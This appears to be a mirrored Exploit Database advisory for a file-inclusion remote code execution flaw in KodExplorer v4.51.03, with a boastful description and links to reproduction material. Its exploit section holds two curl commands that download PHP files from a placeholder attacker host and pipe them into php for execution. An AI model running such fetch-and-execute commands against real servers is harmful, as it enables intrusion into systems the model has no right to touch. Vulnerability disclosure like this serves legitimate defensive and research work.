KodExplorer v4.51.03 – Pwned-Admin File-Inclusion – Remote Code Execution (RCE)

• Exploit Database
• 17 阅读

• 作者： nu11secur1ty
  日期： 2023-05-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51419/

• ## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
  ## Author: nu11secur1ty
  ## Date: 04.30.2023
  ## Vendor: https://kodcloud.com/
  ## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
  ## Reference: https://portswigger.net/web-security/file-upload
  
  ## Description:
  By using this vulnerability remotely, the malicious pwned_admin can
  list and manipulate all files inside the server. This is an absolutely
  DANGEROUS and STUPID decision from the application owner! In this
  scenario, the attacker prepares the machine for exploitation and sends
  a link for remote execution by using the CURL protocol to his
  supporter - another attacker. Then and he waits for execution from his
  colleague, to mask his action or even more worst than ever. What a
  nice hack is this! :)
  
  STATUS: CRITICAL Vulnerability
  
  [+]Exploit:
  ```CURL
  curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php
  | php
  curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php
  | php
  
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)
  
  ## Proof and Exploit:
  [href](https://streamable.com/98npd0)
  
  ## Time spend:
  01:15:00
  
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
  https://www.exploit-db.com/
  0day Exploit DataBase https://0day.today/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>